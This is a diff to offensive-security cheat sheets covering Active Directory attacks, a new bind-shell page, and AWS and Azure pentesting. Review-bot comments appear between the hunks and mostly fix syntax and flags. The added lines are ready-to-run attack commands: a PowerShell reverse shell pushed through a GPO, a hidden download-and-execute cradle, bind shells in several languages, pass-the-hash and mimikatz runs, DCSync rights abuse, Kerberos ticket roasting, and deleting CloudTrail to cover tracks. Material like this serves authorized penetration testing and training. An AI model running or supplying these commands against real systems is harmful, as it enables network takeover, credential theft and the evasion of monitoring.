crackmapexec smb -M name_module -o VAR=DATA - crackmapexec 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f --local-auth - crackmapexec 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f --shares - crackmapexec 192.168.1.100 -u Administrator -H ':5858d47a41e40b40f294b3100bea611f' -d 'DOMAIN' -M invoke_sessiongopher - crackmapexec 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f -M rdp -o ACTION=enable - crackmapexec 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f -M metinject -o LHOST=192.168.1.63 LPORT=4443 - crackmapexec 192.168.1.100 -u Administrator -H ":5858d47a41e40b40f294b3100bea611f" -M web_delivery -o URL="https://IP:PORT/posh-payload" - crackmapexec 192.168.1.100 -u Administrator -H ":5858d47a41e40b40f294b3100bea611f" --exec-method smbexec -X 'whoami' - crackmapexec smb 10.10.14.0/24 -u user -p 'Password' --local-auth -M mimikatz - crackmapexec mimikatz --server http --server-port 80 + ```powershell + # use the latest release, CME is now a binary packaged will all its dependencies + root@payload$ wget https://github.com/byt3bl33d3r/CrackMapExec/releases/download/v5.0.1dev/cme-ubuntu-latest.zip + + # execute cme (smb, winrm, mssql, ...) 
+ root@payload$ cme smb -L + root@payload$ cme smb -M name_module -o VAR=DATA + root@payload$ cme smb 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f --local-auth + root@payload$ cme smb 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f --shares + root@payload$ cme smb 192.168.1.100 -u Administrator -H ':5858d47a41e40b40f294b3100bea611f' -d 'DOMAIN' -M invoke_sessiongopher + root@payload$ cme smb 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f -M rdp -o ACTION=enable + root@payload$ cme smb 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f -M metinject -o LHOST=192.168.1.63 LPORT=4443 + root@payload$ cme smb 192.168.1.100 -u Administrator -H ":5858d47a41e40b40f294b3100bea611f" -M web_delivery -o URL="https://IP:PORT/posh-payload" + root@payload$ cme smb 192.168.1.100 -u Administrator -H ":5858d47a41e40b40f294b3100bea611f" --exec-method smbexec -X 'whoami' + root@payload$ cme smb 10.10.14.0/24 -u user -p 'Password' --local-auth -M mimikatz + root@payload$ cme mimikatz --server http --server-port 80 ``` * [Mitm6](https://github.com/fox-it/mitm6.git) @@ -391,7 +406,14 @@ Get-NetGPOGroup ### Exploit Group Policy Objects GPO +> Creators of a GPO are automatically granted explicit Edit settings, delete, modify security, which manifests as CreateChild, DeleteChild, Self, WriteProperty, DeleteTree, Delete, GenericRead, WriteDacl, WriteOwner + ```powershell +# Build and configure SharpGPOAbuse +git clone https://github.com/FSecureLABS/SharpGPOAbuse +Install-Package CommandLineParser -Version 1.9.3.15 +ILMerge.exe /out:C:\SharpGPOAbuse.exe C:\Release\SharpGPOAbuse.exe C:\Release\CommandLine.dll + # Adding User Rights SharpGPOAbuse.exe --AddUserRights --UserRights "SeTakeOwnershipPrivilege,SeRemoteInteractiveLogonRight" --UserAccount bob.smith --GPOName "Vulnerable GPO" 
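Review bot: two of the new ingestor lines have lost their placeholders: `.\SharpHound.exe --CollectionMethod All --LDAPUser --LDAPPass --JSONFolder` and `Invoke-BloodHound -CollectionMethod All -LDAPUser -LDAPPass -OutputDirectory` show flags with no values, most likely `<user>`-style tokens that Markdown swallowed as HTML tags; escape them or use `USER`, `PASS` and `C:\path` stand-ins so the commands are copy-pasteable. In the CrackMapExec block, `packaged will all its dependencies` should be `with`, the download URL pins a development build (`v5.0.1dev/cme-ubuntu-latest.zip`) that will go stale quickly, so link the releases page instead, and the new `root@payload$` prompt differs from the `root@kali:...$` prompt used elsewhere in this file; pick one.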
@@ -405,6 +427,32 @@ SharpGPOAbuse.exe --AddUserScript --ScriptName StartupScript.bat --ScriptContent SharpGPOAbuse.exe --AddComputerTask --TaskName "Update" --Author DOMAIN\Admin --Command "cmd.exe" --Arguments "/c powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.1.1.10:80/a'))\"" --GPOName "Vulnerable GPO" ``` +Abuse GPO with **pyGPOAbuse** + +```powershell +git clone https://github.com/Hackndo/pyGPOAbuse +# Add john user to local administrators group (Password: H4x00r123..) +./pygpoabuse.py DOMAIN/user -hashes lm:nt -gpo-id "12345677-ABCD-9876-ABCD-123456789012" + +# Reverse shell example +./pygpoabuse.py DOMAIN/user -hashes lm:nt -gpo-id "12345677-ABCD-9876-ABCD-123456789012" \ + -powershell \ + -command "\$client = New-Object System.Net.Sockets.TCPClient('10.20.0.2',1234);\$stream = \$client.GetStream();[byte[]]\$bytes = 0..65535|%{0};while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){;\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i);\$sendback = (iex \$data 2>&1 | Out-String );\$sendback2 = \$sendback + 'PS ' + (pwd).Path + '> ';\$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()};\$client.Close()" \ + -taskname "Completely Legit Task" \ + -description "Dis is legit, pliz no delete" \ + -user +``` + +Abuse GPO with **PowerView** + +```powershell +# Enumerate GPO +Get-NetGPO | %{Get-ObjectAcl -ResolveGUIDs -Name $_.Name} + +# New-GPOImmediateTask to push an Empire stager out to machines via VulnGPO +New-GPOImmediateTask -TaskName Debugging -GPODisplayName VulnGPO -CommandArguments '-NoP -NonI -W Hidden -Enc AAAAAAA...' -Force +``` + ### Dumping AD Domain Credentials 
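Review bot: the PowerView line `Get-NetGPO | %{Get-ObjectAcl -ResolveGUIDs -Name $_.Name}` dumps every ACE on every GPO, which is unreadable on a real domain; the question the section asks is which GPOs the current principal can edit, so filter on `ActiveDirectoryRights` matching `WriteProperty|WriteDacl|WriteOwner|GenericAll` (the rights named in the blockquote above) and on an `IdentityReference` you control. In the pyGPOAbuse reverse-shell example the trailing `-user` has no argument and reads like a truncated placeholder; add a short comment that it is a switch (per the tool's help it targets the user side of the GPO instead of the computer side) so nobody appends a username to it. The `-gpo-id` value is a dummy GUID; say so in a comment, as the first comment already does for the password, to avoid copy-paste confusion.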
@@ -667,6 +715,11 @@ root@kali:ticket_converter$ python ticket_converter.py velociraptor.kirbi veloci Converting kirbi => ccache ``` + +Mitigations: +* Hard to detect because they are legit TGT tickets +* Mimikatz generate a golden ticket with a life-span of 10 years + ### Pass-the-Ticket Silver Tickets Forging a TGS require machine accound password (key) or NTLM hash from the KDC @@ -686,6 +739,9 @@ root@kali:/tmp$ export KRB5CCNAME=/home/user/ticket.ccache root@kali:/tmp$ ./psexec.py -k -no-pass -dc-ip 192.168.1.1 AD/administrator@192.168.1.100 ``` +Mitigations: +* Set the attribute "Account is Sensitive and Cannot be Delegated" to prevent lateral movement with the generated ticket. + ### Kerberoasting > "A service principal name (SPN) is a unique identifier of a service instance. SPNs are used by Kerberos authentication to associate a service instance with a service logon account. " - [MSDN](https://docs.microsoft.com/fr-fr/windows/desktop/AD/service-principal-names) @@ -719,12 +775,12 @@ Alternatively on macOS machine you can use [bifrost](https://github.com/its-a-fe Then crack the ticket with hashcat or john ```powershell -hashcat -m 13100 -a 0 hash.txt crackstation.txt -./john ~/hash.txt --wordlist=rockyou.lst +./hashcat -m 13100 -a 0 kerberos_hashes.txt crackstation.txt +./john --wordlist=/opt/wordlists/rockyou.txt --fork=4 --format=krb5tgs ~/kerberos_hashes.txt ``` Mitigations: -* Have a very long password for your accounts with SPNs (> 25 characters) +* Have a very long password for your accounts with SPNs (> 32 characters) * Make sure no users have SPNs ### KRB_AS_REP Roasting 
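Review bot: the two bullets added under `Mitigations:` after the golden-ticket section are not mitigations. `Hard to detect because they are legit TGT tickets` describes the attack, and `Mimikatz generate a golden ticket with a life-span of 10 years` is a detection hint (a TGT lifetime far above the domain's `MaxTicketAge` is the classic indicator). Rename that list to `Detection`, fix `generate` to `generates`, and add the actual mitigation: reset the `krbtgt` password twice, with replication in between, after a suspected compromise so forged TGTs stop validating. The silver-ticket bullet `Set the attribute "Account is Sensitive and Cannot be Delegated"` is the wrong control here: that flag stops the account's credentials from being delegated and belongs with the delegation sections; a forged TGS is accepted because it is encrypted with the service account's key, so the relevant mitigations are rotating the computer/service account password and enabling KDC PAC validation. In the Kerberoasting hunk the recommended SPN password length was silently raised from `> 25` to `> 32` characters; cite a source for 32 or keep the old value, and mention group Managed Service Accounts, which remove the problem entirely.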
@@ -771,6 +827,13 @@ C:\Rubeus> john --wordlist=passwords_kerb.txt hashes.asreproast Using `impacket` to get the hash and `hashcat` to crack it. ```powershell +# example +$ python GetNPUsers.py htb.local/svc-alfresco -no-pass +Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation + +[*] Getting TGT for svc-alfresco +$krb5asrep$23$svc-alfresco@HTB.LOCAL:c13528009a59be0a634bb9b8e84c88ee$cb8e87d02bd0ac7ae561334cd58a56af90f7fbb20bbd4493b6754a57d5ebc08cb7f47ea472ebb7c9ba4260f57c11b664be03191550254e5c77a17518aeabc55f9321bd9f52201df820e130aa0e3f4b0986725fd3a14794433881050eb62d384c4058a407a348a7de2ef0767a99c9df4f85d8eba8ce30a4ad59621c51f8ea8c0d33f33e06bea1d8ff28d7a86fc2010fd7fa45d2fcc2178cb13c1006823aec8a5da10cffcceeb6e978754b0d4976df5cccb4beb9776d5a8f4810153ccc0e1237ec74e6ae61402457c6cfe29bca7c2f62b287f13aff063f5a0a21c728581e43b46d7537b3e776b4 + # extract hashes root@kali:impacket-examples$ python GetNPUsers.py jurassic.park/ -usersfile usernames.txt -format hashcat -outputfile hashes.asreproast root@kali:impacket-examples$ python GetNPUsers.py jurassic.park/triceratops:Sh4rpH0rns -request -format hashcat -outputfile hashes.asreproast @@ -779,6 +842,9 @@ root@kali:impacket-examples$ python GetNPUsers.py jurassic.park/triceratops:Sh4r root@kali:impacket-examples$ hashcat -m 18200 --force -a 0 hashes.asreproast passwords_kerb.txt ``` +Mitigations: +* All accounts must have "Kerberos Pre-Authentication" enabled (Enabled by Default). + ### Pass-the-Hash The types of hashes you can use with Pass-The-Hash are NT or NTLM hashes. Since Windows Vista, attackers have been unable to pass-the-hash to local admin accounts that weren’t the built-in RID 500. 
@@ -1019,24 +1085,59 @@ Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccount ### Abusing Active Directory ACLs/ACEs -* **GenericAll on User** : We can reset user's password without knowing the current password -* **GenericAll on Group** : Effectively, this allows us to add ourselves (the user spotless) to the Domain Admin group : `net group "domain admins" spotless /add /domain` -* **WriteProperty on Group** : We can again add ourselves to the Domain Admins group and escalate privileges: `net user spotless /domain; Add-NetGroupUser -UserName spotless -GroupName "domain admins" -Domain "offense.local"; net user spotless /domain` -* **Self (Self-Membership) on Group** : Another privilege that enables the attacker adding themselves to a group -* **ForceChangePassword** : we can reset the user's password without knowing their current password: `$c = Get-Credential;Set-DomainUserPassword -Identity changeme -AccountPassword $c.Password -Verbose` -* **GenericWrite on User** : WriteProperty on an ObjectType, which in this particular case is Script-Path, allows the attacker to overwrite the logon script path of the delegate user, which means that the next time, when the user delegate logs on, their system will execute our malicious script : `Set-ADObject -SamAccountName delegate -PropertyName scriptpath -PropertyValue "\\10.0.0.5\totallyLegitScript.ps1` -* **WriteDACL** : It is possible to add any given account as a replication partner of the domain by applying the following extended rights Replicating Directory Changes/Replicating Directory Changes All. 
[Invoke-ACLPwn](https://github.com/fox-it/Invoke-ACLPwn) is a tool that automates the discovery and pwnage of ACLs in Active Directory that are unsafe configured : `./Invoke-ACL.ps1 -SharpHoundLocation .\sharphound.exe -mimiKatzLocation .\mimikatz.exe -Username 'testuser' -Domain 'xenoflux.local' -Password 'Welcome01!'` - ```powershell - # give DCSync right to titi - Add-ObjectACL -TargetDistinguishedName "dc=dev,dc=testlab,dc=local" -PrincipalSamAccountName titi -Rights DCSync - ``` - Check ACL for an User with [ADACLScanner](https://github.com/canix1/ADACLScanner). ```powershell ADACLScan.ps1 -Base "DC=contoso;DC=com" -Filter "(&(AdminCount=1))" -Scope subtree -EffectiveRightsPrincipal User1 -Output HTML -Show ``` +#### GenericAll + +* **GenericAll on User** : We can reset user's password without knowing the current password +* **GenericAll on Group** : Effectively, this allows us to add ourselves (the user spotless) to the Domain Admin group : `net group "domain admins" spotless /add /domain` + +GenericAll/GenericWrite we can set a SPN on a target account, request a TGS, then grab its hash and kerberoast it. 
+ +```powershell +# using PowerView +# Check for interesting permissions on accounts: +Invoke-ACLScanner -ResolveGUIDs | ?{$_.IdentinyReferenceName -match "RDPUsers"} + +# Check if current user has already an SPN setted: +Get-DomainUser -Identity | select serviceprincipalname + +# Force set the SPN on the account: +Set-DomainObject -Set @{serviceprincipalname='ops/whatever1'} +``` + +#### GenericWrite + +* Reset another user's password + + ```powershell + # https://github.com/EmpireProject/Empire/blob/master/data/module_source/situational_awareness/network/powerview.ps1 + $user = 'DOMAIN\user1'; + $pass= ConvertTo-SecureString 'user1pwd' -AsPlainText -Force; + $creds = New-Object System.Management.Automation.PSCredential $user, $pass; + $newpass = ConvertTo-SecureString 'newsecretpass' -AsPlainText -Force; + Set-DomainUserPassword -Identity 'DOMAIN\user2' -AccountPassword $newpass -Credential $creds; + ``` + +* WriteProperty on an ObjectType, which in this particular case is Script-Path, allows the attacker to overwrite the logon script path of the delegate user, which means that the next time, when the user delegate logs on, their system will execute our malicious script : `Set-ADObject -SamAccountName delegate -PropertyName scriptpath -PropertyValue "\\10.0.0.5\totallyLegitScript.ps1` + + +#### WriteDACL + +To abuse WriteDacl to a domain object, you may grant yourself the DcSync privileges. It is possible to add any given account as a replication partner of the domain by applying the following extended rights Replicating Directory Changes/Replicating Directory Changes All. 
[Invoke-ACLPwn](https://github.com/fox-it/Invoke-ACLPwn) is a tool that automates the discovery and pwnage of ACLs in Active Directory that are unsafe configured : `./Invoke-ACL.ps1 -SharpHoundLocation .\sharphound.exe -mimiKatzLocation .\mimikatz.exe -Username 'user1' -Domain 'domain.local' -Password 'Welcome01!'` + +```powershell +# Give DCSync right to the principal identity +Import-Module .\PowerView.ps1 +$SecPassword = ConvertTo-SecureString 'user1pwd' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('DOMAIN.LOCAL\user1', $SecPassword) +Add-DomainObjectAcl -Credential $Cred -TargetIdentity 'DC=domain,DC=local' -Rights DCSync -PrincipalIdentity user2 -Verbose -Domain domain.local +``` + ### Trust relationship between domains @@ -1193,7 +1294,9 @@ Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation [*] Saving ticket in Administrator.ccache # Exploit with Rubeus -$ rubeus s4u /user:user_for_delegation /rc4:user_pwd_hash /impersonateuser:user_to_impersonate /domain:domain.com /dc:dc01.domain.com /msdsspn:cifs/srv01.domain.com /ptt +$ ./Rubeus.exe s4u /user:user_for_delegation /rc4:user_pwd_hash /impersonateuser:user_to_impersonate /domain:domain.com /dc:dc01.domain.com /msdsspn:cifs/srv01.domain.com /ptt +$ ./Rubeus.exe s4u /user:MACHINE$ /rc4:MACHINE_PWD_HASH /impersonateuser:Administrator /msdsspn:"cifs/dc.domain.com" /ptt +$ dir \\dc.domain.com\c$ ``` 
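Review bot: the ACL restructuring in hunk @@ -1019 drops three items from the removed bullet list that are not re-added under the new `#### GenericAll` / `#### GenericWrite` / `#### WriteDACL` headers: `WriteProperty on Group`, `Self (Self-Membership) on Group` and `ForceChangePassword` (with its `$c = Get-Credential;Set-DomainUserPassword -Identity changeme ...` command); re-add them or call out the deletion. In the added PowerView SPN block, `$_.IdentinyReferenceName` is misspelled (`IdentityReferenceName`), and both `Get-DomainUser -Identity | select serviceprincipalname` and `Set-DomainObject -Set @{serviceprincipalname='ops/whatever1'}` are missing the target account argument (`-Identity <user>`), so they fail as written. The `Set-ADObject ... -PropertyValue "\\10.0.0.5\totallyLegitScript.ps1` line carried over from the old text still lacks its closing quote, and "has already an SPN setted" should be "already has an SPN set".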
@@ -1503,6 +1606,7 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 6b3723410a3c5 ## References +* [Explain like I’m 5: Kerberos - Apr 2, 2013 - @roguelynn](https://www.roguelynn.com/words/explain-like-im-5-kerberos/) * [Impersonating Office 365 Users With Mimikatz - January 15, 2017 - Michael Grafnetter](#https://www.dsinternals.com/en/impersonating-office-365-users-mimikatz/) * [Abusing Exchange: One API call away from Domain Admin - Dirk-jan Mollema](https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domain-admin) * [Abusing Kerberos: Kerberoasting - Haboob Team](https://www.exploit-db.com/docs/english/45051-abusing-kerberos---kerberoasting.pdf) 
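Review bot: the Impersonating Office 365 Users reference in the `## References` context line links to `#https://www.dsinternals.com/en/impersonating-office-365-users-mimikatz/`; the leading `#` turns the URL into an in-page anchor, so the link is dead. The same reference is added with the correct URL in the Azure Pentest file later in this change; fix this one to match while the list is being touched.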
@@ -1563,4 +1667,10 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 6b3723410a3c5 * [SMB Share – SCF File Attacks - December 13, 2017 - @netbiosX](pentestlab.blog/2017/12/13/smb-share-scf-file-attacks/) * [Escalating privileges with ACLs in Active Directory - April 26, 2018 - Rindert Kramer and Dirk-jan Mollema](https://blog.fox-it.com/2018/04/26/escalating-privileges-with-acls-in-active-directory/) * [A Red Teamer’s Guide to GPOs and OUs - APRIL 2, 2018 - @_wald0](https://wald0.com/?p=179) -* [Carlos Garcia - Rooted2019 - Pentesting Active Directory Forests public.pdf](https://www.dropbox.com/s/ilzjtlo0vbyu1u0/Carlos%20Garcia%20-%20Rooted2019%20-%20Pentesting%20Active%20Directory%20Forests%20public.pdf?dl=0) \ No newline at end of file +* [Carlos Garcia - Rooted2019 - Pentesting Active Directory Forests public.pdf](https://www.dropbox.com/s/ilzjtlo0vbyu1u0/Carlos%20Garcia%20-%20Rooted2019%20-%20Pentesting%20Active%20Directory%20Forests%20public.pdf?dl=0) +* [Kerberosity Killed the Domain: An Offensive Kerberos Overview - Ryan Hausknecht - Mar 10](https://posts.specterops.io/kerberosity-killed-the-domain-an-offensive-kerberos-overview-eb04b1402c61) +* [Active-Directory-Exploitation-Cheat-Sheet - @buftas](https://github.com/buftas/Active-Directory-Exploitation-Cheat-Sheet#local-privilege-escalation) +* [GPO Abuse - Part 1 - RastaMouse - 6 January 2019](https://rastamouse.me/2019/01/gpo-abuse-part-1/) +* [GPO Abuse - Part 2 - RastaMouse - 13 January 2019](https://rastamouse.me/2019/01/gpo-abuse-part-2/) +* [Abusing GPO Permissions - harmj0y - March 17, 2016](https://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/) +* [How To Attack Kerberos 101 - m0chan - July 31, 2019](https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html) \ No newline at end of file diff --git a/Methodology and Resources/Bind Shell Cheatsheet.md b/Methodology and Resources/Bind Shell Cheatsheet.md new file mode 100644 index 0000000..73df69d --- /dev/null 
+++ b/Methodology and Resources/Bind Shell Cheatsheet.md @@ -0,0 +1,71 @@ +# Bind Shell + +## Summary + +* [Reverse Shell](#reverse-shell) + * [Perl](#perl) + * [Python](#python) + * [PHP](#php) + * [Ruby](#ruby) + * [Netcat Traditional](#netcat-traditional) + * [Netcat OpenBsd](#netcat-openbsd) + * [Ncat](#ncat) + * [Socat](#socat) + * [Powershell](#powershell) + + +## Perl + +```perl +perl -e 'use Socket;$p=51337;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));\ +bind(S,sockaddr_in($p, INADDR_ANY));listen(S,SOMAXCONN);for(;$p=accept(C,S);\ +close C){open(STDIN,">&C");open(STDOUT,">&C");open(STDERR,">&C");exec("/bin/bash -i");};' +``` + +## PHP + +```php +php -r '$s=socket_create(AF_INET,SOCK_STREAM,SOL_TCP);socket_bind($s,"0.0.0.0",51337);\ +socket_listen($s,1);$cl=socket_accept($s);while(1){if(!socket_write($cl,"$ ",2))exit;\ +$in=socket_read($cl,100);$cmd=popen("$in","r");while(!feof($cmd)){$m=fgetc($cmd);\ + socket_write($cl,$m,strlen($m));}}' +``` + +## Ruby + +```ruby +ruby -rsocket -e 'f=TCPServer.new(51337);s=f.accept;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",s,s,s)' +``` + +## Netcat Traditional + +```powershell +nc -nlvp 51337 -e /bin/bash +``` + +## Netcat OpenBsd + +```powershell +rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc -lvp 51337 >/tmp/f +``` + +## Socat + +```powershell +user@attacker$ socat FILE:`tty`,raw,echo=0 TCP:target.com:12345 +user@victim$ socat TCP-LISTEN:12345,reuseaddr,fork EXEC:/bin/sh,pty,stderr,setsid,sigint,sane +``` + +## Powershell + +```powershell +https://github.com/besimorhino/powercat + +# Victim (listen) +. .\powercat.ps1 +powercat -l -p 7002 -ep + +# Connect from attacker +. .\powercat.ps1 +powercat -c 127.0.0.1 -p 7002 +``` \ No newline at end of file diff --git a/Methodology and Resources/Cloud - AWS Pentest.md b/Methodology and Resources/Cloud - AWS Pentest.md index bfe25c0..2342c2b 100644 --- a/Methodology and Resources/Cloud - AWS Pentest.md +++ b/Methodology and Resources/Cloud - AWS Pentest.md 
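Review bot: in the new `Bind Shell Cheatsheet.md` above, the Summary's only top-level entry is `[Reverse Shell](#reverse-shell)` although the document is titled Bind Shell and no such heading exists, and it lists `Python` and `Ncat` entries that have no matching sections; rename the entry to `Bind Shell` and either add the two sections or drop the entries. Minor: the Powershell block puts the powercat repository URL inside the code fence as if it were a command; move it into a `#` comment or the prose above.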
@@ -12,6 +12,7 @@ * [Method for Container Service (Fargate)](#method-for-container-service-fargate) * [AWS - Shadow Admin](#aws---shadow-admin) * [Admin equivalent permission](#admin-equivalent-permission) +* [AWS - Gaining AWS Console Access via API Keys](#aws---gaining-aws-console-access-via-api-keys) * [AWS - Mount EBS volume to EC2 Linux](#aws---mount-ebs-volume-to-ec2-linux) * [AWS - Copy EC2 using AMI Image](#aws---copy-ec2-using-ami-image) * [AWS - Instance Connect - Push an SSH key to EC2 instance](#aws---instance-connect---push-an-ssh-key-to-ec2-instance) 
@@ -331,6 +332,23 @@ Example : https://awesomeapp.com/forward?target=http://169.254.169.254/latest/me $ aws glue create-dev-endpoint –endpoint-name my_dev_endpoint –role-arn arn_of_glue_service_role –public-key file://path/to/my/public/ssh/key.pub ``` +## AWS - Gaining AWS Console Access via API Keys + +A utility to convert your AWS CLI credentials into AWS console access. + +```powershell +$> git clone https://github.com/NetSPI/aws_consoler +$> aws_consoler -v -a AKIA[REDACTED] -s [REDACTED] +2020-03-13 19:44:57,800 [aws_consoler.cli] INFO: Validating arguments... +2020-03-13 19:44:57,801 [aws_consoler.cli] INFO: Calling logic. +2020-03-13 19:44:57,820 [aws_consoler.logic] INFO: Boto3 session established. +2020-03-13 19:44:58,193 [aws_consoler.logic] WARNING: Creds still permanent, creating federated session. +2020-03-13 19:44:58,698 [aws_consoler.logic] INFO: New federated session established. +2020-03-13 19:44:59,153 [aws_consoler.logic] INFO: Session valid, attempting to federate as arn:aws:sts::123456789012:federated-user/aws_consoler. +2020-03-13 19:44:59,668 [aws_consoler.logic] INFO: URL generated! +https://signin.aws.amazon.com/federation?Action=login&Issuer=consoler.local&Destination=https%3A%2F%2Fconsole.aws.amazon.com%2Fconsole%2Fhome%3Fregion%3Dus-east-1&SigninToken=[REDACTED +``` + ## AWS - Mount EBS volume to EC2 Linux :warning: EBS snapshots are block-level incremental, which means that every snapshot only copies the blocks (or areas) in the volume that had been changed since the last snapshot. To restore your data, you need to create a new EBS volume from one of your EBS snapshots. The new volume will be a duplicate of the initial EBS volume on which the snapshot was taken. 
@@ -456,6 +474,25 @@ Prerequisite: 14. locally run `"secretsdump.py -system ./SYSTEM -ntds ./ntds.dit local -outputfile secrets'`, expects secretsdump to be on path +## Disable CloudTrail + +```powershell +$ aws cloudtrail delete-trail --name cloudgoat_trail --profile administrator +``` + +Disable monitoring of events from global services + +```powershell +$ aws cloudtrail update-trail --name cloudgoat_trail --no-include-global-service-event +``` + +Disable Cloud Trail on specific regions + +```powershell +$ aws cloudtrail update-trail --name cloudgoat_trail --no-include-global-service-event --no-is-multi-region --region=eu-west +``` + + ## Cover tracks by obfuscating Cloudtrail logs and Guard Duty :warning: When using awscli on Kali Linux, Pentoo and Parrot Linux, a log is generated based on the user-agent. 
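Review bot: the `## Disable CloudTrail` hunk's `update-trail` commands use option names the AWS CLI does not accept: the flags are `--no-include-global-service-events` (plural) and `--no-is-multi-region-trail`, and `--region=eu-west` is not a region identifier (regions take the form `eu-west-1`); as written each command exits with a usage error. Correct the three lines, e.g. `aws cloudtrail update-trail --name cloudgoat_trail --no-include-global-service-events --no-is-multi-region-trail --region eu-west-1`.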
@@ -570,4 +607,5 @@ https://github.com/DenizParlak/Zeus * [HOW I HACKED A WHOLE EC2 NETWORK DURING A PENETRATION TEST - by Federico Fernandez](https://www.secsignal.org/en/news/how-i-hacked-a-whole-ec2-network-during-a-penetration-test/) * [How to Attach and Mount an EBS volume to EC2 Linux Instance - AUGUST 17, 2016](https://devopscube.com/mount-ebs-volume-ec2-instance/) * [Getting shell and data access in AWS by chaining vulnerabilities - Riyaz Walikar - Aug 29, 2019 ](https://blog.appsecco.com/getting-shell-and-data-access-in-aws-by-chaining-vulnerabilities-7630fa57c7ed) -* [Getting started with Version 2 of AWS EC2 Instance Metadata service (IMDSv2) - Sunesh Govindaraj - Nov 25, 2019](https://blog.appsecco.com/getting-started-with-version-2-of-aws-ec2-instance-metadata-service-imdsv2-2ad03a1f3650) \ No newline at end of file +* [Getting started with Version 2 of AWS EC2 Instance Metadata service (IMDSv2) - Sunesh Govindaraj - Nov 25, 2019](https://blog.appsecco.com/getting-started-with-version-2-of-aws-ec2-instance-metadata-service-imdsv2-2ad03a1f3650) +* [Gaining AWS Console Access via API Keys - Ian Williams - March 18th, 2020](https://blog.netspi.com/gaining-aws-console-access-via-api-keys/) \ No newline at end of file diff --git a/Methodology and Resources/Cloud - Azure Pentest.md b/Methodology and Resources/Cloud - Azure Pentest.md index 3cbe340..056261a 100644 --- a/Methodology and Resources/Cloud - Azure Pentest.md +++ b/Methodology and Resources/Cloud - Azure Pentest.md 
@@ -7,6 +7,8 @@ * [Azure Storage Account - Access](#azure-storage-account----access) * [Azure AD vs Active Directory](#azure-ad-vs-active-directory) * [Azure AD - Enumeration](#azure-ad---enumeration) +* [Azure AD - Password Spray](#azure-ad---password-spray) +* [Azure AD - Convert GUID to SID](#azure-ad---convert-guid-to-sid) * [Azure AD - Sign in with a service principal](#azure-ad---sign-in-with-a-service-principal) * [Azure AD Connect - Password extraction](#azure-ad-connect---password-extraction) * [Azure AD Connect - MSOL Account's password and DCSync](#azure-ad-connect---msol-accounts-password-and-dcsync) @@ -28,8 +30,9 @@ $ git clone https://github.com/hausec/PowerZure $ ipmo .\PowerZure $ Set-Subscription -Id [idgoeshere] + # Reader - $ Get-Runbook + $ Get-Runbook, Get-AllUsers, Get-Apps, Get-Resources, Get-WebApps, Get-WebAppDetails # Contributor $ Execute-Command -OS Windows -VM Win10Test -ResourceGroup Test-RG -Command "whoami" @@ -172,6 +175,21 @@ Found Container - hrsecure.blob.core.windows.net/NETSPItest ## Azure AD - Enumeration +> By default it is possible to query almost all the information about the directory as authenticated user, even when the Azure portal is restricted, using Azure AD Graph. + +Check if the compagny is using Azure AD with `https://login.microsoftonline.com/getuserrealm.srf?login=username@target.onmicrosoft.com&xml=1`. + +```powershell +$ git clone https://github.com/dirkjanm/ROADtools +$ pip install roadrecon +$ roadrecon auth [-h] [-u USERNAME] [-p PASSWORD] [-t TENANT] [-c CLIENT] [--as-app] [--device-code] [--access-token ACCESS_TOKEN] [--refresh-token REFRESH_TOKEN] [-f TOKENFILE] [--tokens-stdout] +$ roadrecon gather [-h] [-d DATABASE] [-f TOKENFILE] [--tokens-stdin] [--mfa] +$ roadrecon dump +$ roadrecon gui +``` + +Can be used in BloodHound using the fork : https://github.com/dirkjanm/BloodHound-AzureAD + ```powershell PS C:\> git clone https://github.com/adrecon/AzureADRecon.git PS C:\> Install-Module -Name AzureAD 
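Review bot: in the `## Azure AD - Enumeration` hunk, the `roadrecon auth [-h] [-u USERNAME] ...` and `roadrecon gather [-h] [-d DATABASE] ...` lines are the tool's `--help` usage strings pasted as if they were commands; replace them with a concrete invocation or label them as usage. "Check if the compagny is using Azure AD" -> "company". In the PowerZure hunk, `$ Get-Runbook, Get-AllUsers, Get-Apps, Get-Resources, Get-WebApps, Get-WebAppDetails` is a comma-separated cmdlet list behind a shell prompt, not a runnable line; list the cmdlets one per line or drop the prompt.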
